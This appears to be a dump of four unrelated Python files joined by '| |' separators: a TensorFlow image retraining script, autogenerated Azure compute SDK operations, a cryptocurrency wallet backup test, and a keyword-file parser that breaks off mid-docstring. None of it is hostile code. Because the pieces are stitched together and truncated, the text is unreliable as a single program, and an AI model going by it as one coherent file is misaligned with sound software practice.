  # Set up the pre-trained graph.
  maybe_download_and_extract()
  graph, bottleneck_tensor, jpeg_data_tensor, resized_image_tensor = (
      create_inception_graph())
  # Look at the folder structure, and create lists of all the images.
  image_lists = create_image_lists(FLAGS.image_dir, FLAGS.testing_percentage,
                                   FLAGS.validation_percentage)
  class_count = len(image_lists.keys())
  if class_count == 0:
    print('No valid folders of images found at ' + FLAGS.image_dir)
    return -1
  if class_count == 1:
    print('Only one valid folder of images found at ' + FLAGS.image_dir +
          ' - multiple classes are needed for classification.')
    return -1
  # See if the command-line flags mean we're applying any distortions.
  do_distort_images = should_distort_images(
      FLAGS.flip_left_right, FLAGS.random_crop, FLAGS.random_scale,
      FLAGS.random_brightness)
  with tf.Session(graph=graph) as sess:
    if do_distort_images:
      # We will be applying distortions, so setup the operations we'll need.
      distorted_jpeg_data_tensor, distorted_image_tensor = add_input_distortions(
          FLAGS.flip_left_right, FLAGS.random_crop, FLAGS.random_scale,
          FLAGS.random_brightness)
    else:
      # We'll make sure we've calculated the 'bottleneck' image summaries and
      # cached them on disk.
      cache_bottlenecks(sess, image_lists, FLAGS.image_dir, FLAGS.bottleneck_dir,
                        jpeg_data_tensor, bottleneck_tensor)
    # Add the new layer that we'll be training.
    (train_step, cross_entropy, bottleneck_input, ground_truth_input,
     final_tensor) = add_final_training_ops(len(image_lists.keys()),
                                            FLAGS.final_tensor_name,
                                            bottleneck_tensor)
    # Create the operations we need to evaluate the accuracy of our new layer.
    evaluation_step, prediction = add_evaluation_step(
        final_tensor, ground_truth_input)
    # Merge all the summaries and write them out to /tmp/retrain_logs (by default)
    merged = tf.summary.merge_all()
    train_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/train',
                                         sess.graph)
    validation_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/validation')
    # Set up all our weights to their initial default values.
    init = tf.global_variables_initializer()
    sess.run(init)
    # Run the training for as many cycles as requested on the command line.
    for i in range(FLAGS.how_many_training_steps):
      # Get a batch of input bottleneck values, either calculated fresh every time
      # with distortions applied, or from the cache stored on disk.
      if do_distort_images:
        train_bottlenecks, train_ground_truth = get_random_distorted_bottlenecks(
            sess, image_lists, FLAGS.train_batch_size, 'training',
            FLAGS.image_dir, distorted_jpeg_data_tensor,
            distorted_image_tensor, resized_image_tensor, bottleneck_tensor)
      else:
        train_bottlenecks, train_ground_truth, _ = get_random_cached_bottlenecks(
            sess, image_lists, FLAGS.train_batch_size, 'training',
            FLAGS.bottleneck_dir, FLAGS.image_dir, jpeg_data_tensor,
            bottleneck_tensor)
      # Feed the bottlenecks and ground truth into the graph, and run a training
      # step. Capture training summaries for TensorBoard with the `merged` op.
      train_summary, _ = sess.run([merged, train_step],
                                  feed_dict={bottleneck_input: train_bottlenecks,
                                             ground_truth_input: train_ground_truth})
      train_writer.add_summary(train_summary, i)
      # Every so often, print out how well the graph is training.
      is_last_step = (i + 1 == FLAGS.how_many_training_steps)
      if (i % FLAGS.eval_step_interval) == 0 or is_last_step:
        train_accuracy, cross_entropy_value = sess.run(
            [evaluation_step, cross_entropy],
            feed_dict={bottleneck_input: train_bottlenecks,
                       ground_truth_input: train_ground_truth})
        print('%s: Step %d: Train accuracy = %.1f%%' % (datetime.now(), i,
                                                        train_accuracy * 100))
        print('%s: Step %d: Cross entropy = %f' % (datetime.now(), i,
                                                   cross_entropy_value))
        validation_bottlenecks, validation_ground_truth, _ = (
            get_random_cached_bottlenecks(
                sess, image_lists, FLAGS.validation_batch_size, 'validation',
                FLAGS.bottleneck_dir, FLAGS.image_dir, jpeg_data_tensor,
                bottleneck_tensor))
        # Run a validation step and capture training summaries for TensorBoard
        # with the `merged` op.
        validation_summary, validation_accuracy = sess.run(
            [merged, evaluation_step],
            feed_dict={bottleneck_input: validation_bottlenecks,
                       ground_truth_input: validation_ground_truth})
        validation_writer.add_summary(validation_summary, i)
        print('%s: Step %d: Validation accuracy = %.1f%% (N=%d)' %
              (datetime.now(), i, validation_accuracy * 100,
               len(validation_bottlenecks)))
    # We've completed all our training, so run a final test evaluation on
    # some new images we haven't used before.
    test_bottlenecks, test_ground_truth, test_filenames = (
        get_random_cached_bottlenecks(sess, image_lists, FLAGS.test_batch_size,
                                      'testing', FLAGS.bottleneck_dir,
                                      FLAGS.image_dir, jpeg_data_tensor,
                                      bottleneck_tensor))
    test_accuracy, predictions = sess.run(
        [evaluation_step, prediction],
        feed_dict={bottleneck_input: test_bottlenecks,
                   ground_truth_input: test_ground_truth})
    print('Final test accuracy = %.1f%% (N=%d)' % (
        test_accuracy * 100, len(test_bottlenecks)))
    if FLAGS.print_misclassified_test_images:
      print('=== MISCLASSIFIED TEST IMAGES ===')
      for i, test_filename in enumerate(test_filenames):
        if predictions[i] != test_ground_truth[i].argmax():
          print('%70s %s' % (test_filename,
                             list(image_lists.keys())[predictions[i]]))
    # Write out the trained graph and labels with the weights stored as constants.
    output_graph_def = graph_util.convert_variables_to_constants(
        sess, graph.as_graph_def(), [FLAGS.final_tensor_name])
    with gfile.FastGFile(FLAGS.output_graph, 'wb') as f:
      f.write(output_graph_def.SerializeToString())
    with gfile.FastGFile(FLAGS.output_labels, 'w') as f:
      f.write('\n'.join(image_lists.keys()) + '\n')
if __name__ == '__main__':
  # NOTE(review): '2' is intended to suppress TensorFlow's C++ INFO/WARNING
  # log output -- confirm this is the desired verbosity.
  os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
  parser = argparse.ArgumentParser()
  parser.add_argument(
      '--image_dir',
      type=str,
      default='',
      help='Path to folders of labeled images.'
  )
  parser.add_argument(
      '--output_graph',
      type=str,
      default='/tmp/output_graph.pb',
      help='Where to save the trained graph.'
  )
  parser.add_argument(
      '--output_labels',
      type=str,
      default='/tmp/output_labels.txt',
      help='Where to save the trained graph\'s labels.'
  )
  parser.add_argument(
      '--summaries_dir',
      type=str,
      default='/tmp/retrain_logs',
      help='Where to save summary logs for TensorBoard.'
  )
  parser.add_argument(
      '--how_many_training_steps',
      type=int,
      default=4000,
      help='How many training steps to run before ending.'
  )
  parser.add_argument(
      '--learning_rate',
      type=float,
      default=0.01,
      help='How large a learning rate to use when training.'
  )
  parser.add_argument(
      '--testing_percentage',
      type=int,
      default=10,
      help='What percentage of images to use as a test set.'
  )
  parser.add_argument(
      '--validation_percentage',
      type=int,
      default=10,
      help='What percentage of images to use as a validation set.'
  )
  parser.add_argument(
      '--eval_step_interval',
      type=int,
      default=10,
      help='How often to evaluate the training results.'
  )
  parser.add_argument(
      '--train_batch_size',
      type=int,
      default=100,
      help='How many images to train on at a time.'
  )
  parser.add_argument(
      '--test_batch_size',
      type=int,
      default=-1,
      help="""\
      How many images to test on. This test set is only used once, to evaluate
      the final accuracy of the model after training completes.
      A value of -1 causes the entire test set to be used, which leads to more
      stable results across runs.\
      """
  )
  parser.add_argument(
      '--validation_batch_size',
      type=int,
      default=100,
      help="""\
      How many images to use in an evaluation batch. This validation set is
      used much more often than the test set, and is an early indicator of how
      accurate the model is during training.
      A value of -1 causes the entire validation set to be used, which leads to
      more stable results across training iterations, but may be slower on large
      training sets.\
      """
  )
  parser.add_argument(
      '--print_misclassified_test_images',
      default=False,
      help="""\
      Whether to print out a list of all misclassified test images.\
      """,
      action='store_true'
  )
  parser.add_argument(
      '--model_dir',
      type=str,
      default='/tmp/imagenet',
      help="""\
      Path to classify_image_graph_def.pb,
      imagenet_synset_to_human_label_map.txt, and
      imagenet_2012_challenge_label_map_proto.pbtxt.\
      """
  )
  parser.add_argument(
      '--bottleneck_dir',
      type=str,
      default='/tmp/bottleneck',
      help='Path to cache bottleneck layer values as files.'
  )
  parser.add_argument(
      '--final_tensor_name',
      type=str,
      default='final_result',
      help="""\
      The name of the output classification layer in the retrained graph.\
      """
  )
  parser.add_argument(
      '--flip_left_right',
      default=False,
      help="""\
      Whether to randomly flip half of the training images horizontally.\
      """,
      action='store_true'
  )
  parser.add_argument(
      '--random_crop',
      type=int,
      default=0,
      help="""\
      A percentage determining how much of a margin to randomly crop off the
      training images.\
      """
  )
  parser.add_argument(
      '--random_scale',
      type=int,
      default=0,
      help="""\
      A percentage determining how much to randomly scale up the size of the
      training images by.\
      """
  )
  parser.add_argument(
      '--random_brightness',
      type=int,
      default=0,
      help="""\
      A percentage determining how much to randomly multiply the training image
      input pixels up or down by.\
      """
  )
  # Unrecognized flags are forwarded via argv so tf.app.run can see them.
  FLAGS, unparsed = parser.parse_known_args()
  tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._proximity_placement_groups_operations import build_create_or_update_request, build_delete_request, build_get_request, build_list_by_resource_group_request, build_list_by_subscription_request, build_update_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ProximityPlacementGroupsOperations:
    """ProximityPlacementGroupsOperations async operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.compute.v2020_06_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer) -> None:
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    @distributed_trace_async
    async def create_or_update(
        self,
        resource_group_name: str,
        proximity_placement_group_name: str,
        parameters: "_models.ProximityPlacementGroup",
        **kwargs: Any
    ) -> "_models.ProximityPlacementGroup":
        """Create or update a proximity placement group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param proximity_placement_group_name: The name of the proximity placement group.
        :type proximity_placement_group_name: str
        :param parameters: Parameters supplied to the Create Proximity Placement Group operation.
        :type parameters: ~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroup
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ProximityPlacementGroup, or the result of cls(response)
        :rtype: ~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroup
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ProximityPlacementGroup"]
        # Map well-known ARM status codes onto specific exception types;
        # callers may extend or override this via the 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]

        _json = self._serialize.body(parameters, 'ProximityPlacementGroup')

        request = build_create_or_update_request(
            resource_group_name=resource_group_name,
            proximity_placement_group_name=proximity_placement_group_name,
            subscription_id=self._config.subscription_id,
            content_type=content_type,
            json=_json,
            template_url=self.create_or_update.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        # 200 (updated) and 201 (created) both carry the same model body.
        if response.status_code == 200:
            deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)

        if response.status_code == 201:
            deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'}  # type: ignore

    @distributed_trace_async
    async def update(
        self,
        resource_group_name: str,
        proximity_placement_group_name: str,
        parameters: "_models.ProximityPlacementGroupUpdate",
        **kwargs: Any
    ) -> "_models.ProximityPlacementGroup":
        """Update a proximity placement group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param proximity_placement_group_name: The name of the proximity placement group.
        :type proximity_placement_group_name: str
        :param parameters: Parameters supplied to the Update Proximity Placement Group operation.
        :type parameters: ~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroupUpdate
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ProximityPlacementGroup, or the result of cls(response)
        :rtype: ~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroup
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ProximityPlacementGroup"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]

        _json = self._serialize.body(parameters, 'ProximityPlacementGroupUpdate')

        request = build_update_request(
            resource_group_name=resource_group_name,
            proximity_placement_group_name=proximity_placement_group_name,
            subscription_id=self._config.subscription_id,
            content_type=content_type,
            json=_json,
            template_url=self.update.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'}  # type: ignore

    @distributed_trace_async
    async def delete(
        self,
        resource_group_name: str,
        proximity_placement_group_name: str,
        **kwargs: Any
    ) -> None:
        """Delete a proximity placement group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param proximity_placement_group_name: The name of the proximity placement group.
        :type proximity_placement_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        request = build_delete_request(
            resource_group_name=resource_group_name,
            proximity_placement_group_name=proximity_placement_group_name,
            subscription_id=self._config.subscription_id,
            template_url=self.delete.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        # No body on success; only invoke the custom response hook if provided.
        if cls:
            return cls(pipeline_response, None, {})

    delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'}  # type: ignore

    @distributed_trace_async
    async def get(
        self,
        resource_group_name: str,
        proximity_placement_group_name: str,
        include_colocation_status: Optional[str] = None,
        **kwargs: Any
    ) -> "_models.ProximityPlacementGroup":
        """Retrieves information about a proximity placement group .

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param proximity_placement_group_name: The name of the proximity placement group.
        :type proximity_placement_group_name: str
        :param include_colocation_status: includeColocationStatus=true enables fetching the colocation
         status of all the resources in the proximity placement group.
        :type include_colocation_status: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ProximityPlacementGroup, or the result of cls(response)
        :rtype: ~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroup
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ProximityPlacementGroup"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        request = build_get_request(
            resource_group_name=resource_group_name,
            proximity_placement_group_name=proximity_placement_group_name,
            subscription_id=self._config.subscription_id,
            include_colocation_status=include_colocation_status,
            template_url=self.get.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'}  # type: ignore

    @distributed_trace
    def list_by_subscription(
        self,
        **kwargs: Any
    ) -> AsyncIterable["_models.ProximityPlacementGroupListResult"]:
        """Lists all proximity placement groups in a subscription.

        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ProximityPlacementGroupListResult or the result of
         cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroupListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ProximityPlacementGroupListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        def prepare_request(next_link=None):
            # First page uses the operation's template URL; subsequent pages
            # re-issue the service-provided nextLink as a GET.
            if not next_link:
                request = build_list_by_subscription_request(
                    subscription_id=self._config.subscription_id,
                    template_url=self.list_by_subscription.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_by_subscription_request(
                    subscription_id=self._config.subscription_id,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        async def extract_data(pipeline_response):
            deserialized = self._deserialize("ProximityPlacementGroupListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )

    list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/proximityPlacementGroups'}  # type: ignore

    @distributed_trace
    def list_by_resource_group(
        self,
        resource_group_name: str,
        **kwargs: Any
    ) -> AsyncIterable["_models.ProximityPlacementGroupListResult"]:
        """Lists all proximity placement groups in a resource group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ProximityPlacementGroupListResult or the result of
         cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroupListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ProximityPlacementGroupListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        def prepare_request(next_link=None):
            # First page uses the operation's template URL; subsequent pages
            # re-issue the service-provided nextLink as a GET.
            if not next_link:
                request = build_list_by_resource_group_request(
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    template_url=self.list_by_resource_group.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_by_resource_group_request(
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        async def extract_data(pipeline_response):
            deserialized = self._deserialize("ProximityPlacementGroupListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )

    list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups'}  # type: ignore
| |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Stardust Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
Exercise the wallet backup code. Ported from walletbackup.sh.
Test case is:
4 nodes. 1 2 and 3 send transactions between each other,
fourth node is a miner.
1 2 3 each mine a block to start, then
Miner creates 100 blocks so 1 2 3 each have 50 mature
coins to spend.
Then 5 iterations of 1/2/3 sending coins amongst
themselves to get transactions in the wallets,
and the miner mining one block.
Wallets are backed up using dumpwallet/backupwallet.
Then 5 more iterations of transactions and mining a block.
Miner then generates 101 more blocks, so any
transaction fees paid mature.
Sanity check:
Sum(1,2,3,4 balances) == 114*50
1/2/3 are shutdown, and their wallets erased.
Then restore using wallet.dat backup. And
confirm 1/2/3/4 balances are same as before.
Shutdown again, restore using importwallet,
and confirm again balances are correct.
"""
from test_framework.test_framework import StardustTestFramework
from test_framework.util import *
from random import randint
import logging
# Log test progress to stdout.  NOTE(review): 'sys' is not imported in this
# file directly — presumably provided by 'from test_framework.util import *'
# above; confirm before reorganizing imports.
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO, stream=sys.stdout)
class WalletBackupTest(StardustTestFramework):
    """Exercise wallet backup/restore via backupwallet, dumpwallet and importwallet."""

    def __init__(self):
        super().__init__()
        self.setup_clean_chain = True
        self.num_nodes = 4

    # This mirrors how the network was setup in the bash test:
    # nodes 0-2 are spenders, node 3 is the miner.
    def setup_network(self, split=False):
        # spender nodes get an enlarged keypool so backups cover future keys
        spender_args = [["-keypool=100"] for _ in range(3)]
        self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, spender_args + [[]])
        for src, dst in ((0, 3), (1, 3), (2, 3), (2, 0)):
            connect_nodes(self.nodes[src], dst)
        self.is_network_split = False
        self.sync_all()

    def one_send(self, from_node, to_address):
        """With 50% probability, send a random 0.1-1.0 amount to to_address."""
        if (randint(1, 2) == 1):
            amount = Decimal(randint(1, 10)) / Decimal(10)
            self.nodes[from_node].sendtoaddress(to_address, amount)

    def do_one_round(self):
        """Each spender maybe-sends to the other two, then the miner mines a block."""
        addresses = [self.nodes[n].getnewaddress() for n in range(3)]
        for sender, receiver in ((0, 1), (0, 2), (1, 0), (1, 2), (2, 0), (2, 1)):
            self.one_send(sender, addresses[receiver])
        # Mempools must agree before the miner commits the round to a block.
        sync_mempools(self.nodes)
        self.nodes[3].generate(1)

    # As above, this mirrors the original bash test.
    def start_three(self):
        """Restart the three spender nodes and rebuild the original topology."""
        for n in range(3):
            self.nodes[n] = start_node(n, self.options.tmpdir)
        for src, dst in ((0, 3), (1, 3), (2, 3), (2, 0)):
            connect_nodes(self.nodes[src], dst)

    def stop_three(self):
        for n in range(3):
            stop_node(self.nodes[n], n)

    def erase_three(self):
        """Delete the spender wallets so each restore starts from nothing."""
        for n in range(3):
            os.remove(self.options.tmpdir + "/node{0}/regtest/wallet.dat".format(n))

    def run_test(self):
        logging.info("Generating initial blockchain")
        for n in range(3):
            self.nodes[n].generate(1)
            sync_blocks(self.nodes)
        self.nodes[3].generate(100)
        sync_blocks(self.nodes)

        # Each spender mined one block, matured by the miner's 100 blocks.
        for n in range(3):
            assert_equal(self.nodes[n].getbalance(), 50)
        assert_equal(self.nodes[3].getbalance(), 0)

        logging.info("Creating transactions")
        # Five rounds of sending each other transactions.
        for _ in range(5):
            self.do_one_round()

        logging.info("Backing up")
        tmpdir = self.options.tmpdir
        for n in range(3):
            prefix = tmpdir + "/node{0}".format(n)
            self.nodes[n].backupwallet(prefix + "/wallet.bak")
            self.nodes[n].dumpwallet(prefix + "/wallet.dump")

        logging.info("More transactions")
        for _ in range(5):
            self.do_one_round()

        # Generate 101 more blocks, so any fees paid mature.
        self.nodes[3].generate(101)
        self.sync_all()

        balances = [self.nodes[n].getbalance() for n in range(4)]
        # At this point, there are 214 blocks (103 for setup, then 10 rounds,
        # then 101).  114 are mature, so all wallets should sum to 114*50.
        assert_equal(sum(balances), 5700)

        ##
        # Test restoring spender wallets from backups
        ##
        logging.info("Restoring using wallet.dat")
        self.stop_three()
        self.erase_three()

        # Start node2 with no chain.
        shutil.rmtree(self.options.tmpdir + "/node2/regtest/blocks")
        shutil.rmtree(self.options.tmpdir + "/node2/regtest/chainstate")

        # Restore wallets from the binary backups.
        for n in range(3):
            shutil.copyfile(tmpdir + "/node{0}/wallet.bak".format(n),
                            tmpdir + "/node{0}/regtest/wallet.dat".format(n))

        logging.info("Re-starting nodes")
        self.start_three()
        sync_blocks(self.nodes)
        for n in range(3):
            assert_equal(self.nodes[n].getbalance(), balances[n])

        logging.info("Restoring using dumped wallet")
        self.stop_three()
        self.erase_three()

        # Start node2 with no chain.
        shutil.rmtree(self.options.tmpdir + "/node2/regtest/blocks")
        shutil.rmtree(self.options.tmpdir + "/node2/regtest/chainstate")

        self.start_three()
        # Fresh wallets are empty until the dumps are imported.
        for n in range(3):
            assert_equal(self.nodes[n].getbalance(), 0)

        for n in range(3):
            self.nodes[n].importwallet(tmpdir + "/node{0}/wallet.dump".format(n))
        sync_blocks(self.nodes)
        for n in range(3):
            assert_equal(self.nodes[n].getbalance(), balances[n])
# Standard test entry point: run the framework's main() driver.
if __name__ == '__main__':
    WalletBackupTest().main()
| |
import os
from numpy import array,abs,empty,ndarray
from generic import obj
from simulation import SimulationInput
from developer import DevBase
from debug import *
lcs = ls  # alias; 'ls' presumably comes from 'from debug import *' above — TODO confirm
# support functions for keyword files
def remove_comment(sval):
    """Return sval truncated at the first space (drops a trailing comment)."""
    # str.partition returns sval unchanged in the first slot when no space exists
    return sval.partition(' ')[0]
#end def remove_comment
def expand_array(sval):
    """Split sval on whitespace, unpacking Fortran-style 'N*value' repeat
    tokens into N copies of value.  Returns a list of strings."""
    tokens = []
    for tok in sval.split():
        if '*' not in tok:
            tokens.append(tok)
        else:
            rep, val = tok.rsplit('*', 1)
            tokens += int(rep) * [val]
        #end if
    #end for
    return tokens
#end def expand_array
def read_int(sval):
    """Parse an integer keyword value, ignoring any trailing comment."""
    return int(remove_comment(sval))
#end def read_int
def read_real(sval):
    """Parse a real keyword value; Fortran 'd' exponents are mapped to 'e'."""
    return float(remove_comment(sval).replace('d', 'e'))
#end def read_real
# lowercase Fortran logical words accepted by read_bool
bool_dict = dict(true=True,false=False)

def read_bool(sval):
    """Parse a logical keyword value such as '.TRUE.' or 'false' (case-insensitive)."""
    key = remove_comment(sval).lower().strip('.')
    return bool_dict[key]
#end def read_bool
def read_string(sval):
    # string keyword values are kept verbatim, trailing comment text and all
    return sval
#end def read_string
def read_int_array(sval):
    # expand 'N*value' repeats, then convert to an integer numpy array
    return array(expand_array(sval),dtype=int)
#end def read_int_array
def read_real_array(sval):
    # expand 'N*value' repeats, then convert to a float numpy array
    return array(expand_array(sval),dtype=float)
#end def read_real_array
# Fortran T/F tokens used inside logical array fields
bool_array_dict = dict(T=True,F=False)

def read_bool_array(sval):
    """Parse a logical array field of T/F tokens (with 'N*' repeats)."""
    return array([bool_array_dict[tok] for tok in expand_array(sval)], dtype=bool)
#end def read_bool_array
def write_int(v):
    # integers are written in default decimal form
    return str(v)
#end def write_int
def write_real(v):
    # reals use Python's default repr formatting
    return str(v)
#end def write_real
def write_bool(v):
    """Render a truthy/falsy value as a Fortran logical literal."""
    return '.TRUE.' if v else '.FALSE.'
#end def write_bool
def write_string(v):
    # strings are written exactly as stored
    return v
#end def write_string
def equality(a,b):
    """Exact equality predicate; default run comparison for write_array."""
    return a==b
#end def equality

def real_equality(a,b):
    """Approximate float equality: within 1e-6 relative to the mean magnitude."""
    return abs(a-b)<=1e-6*(abs(a)+abs(b))/2
#end def real_equality

def render_bool(v):
    """Render a bool as a Fortran-style 'T'/'F' array token."""
    if v:
        return 'T'
    else:
        return 'F'
    #end if
#end def render_bool

def write_array(arr,same=equality,render=str,max_repeat=3):
    """Format a 1D array as text, run-length-compressing repeated values.

    Runs longer than max_repeat are written as 'N*value'; shorter runs are
    spelled out element by element.  'same' compares elements and 'render'
    converts one element to text.  Every token carries a trailing space.
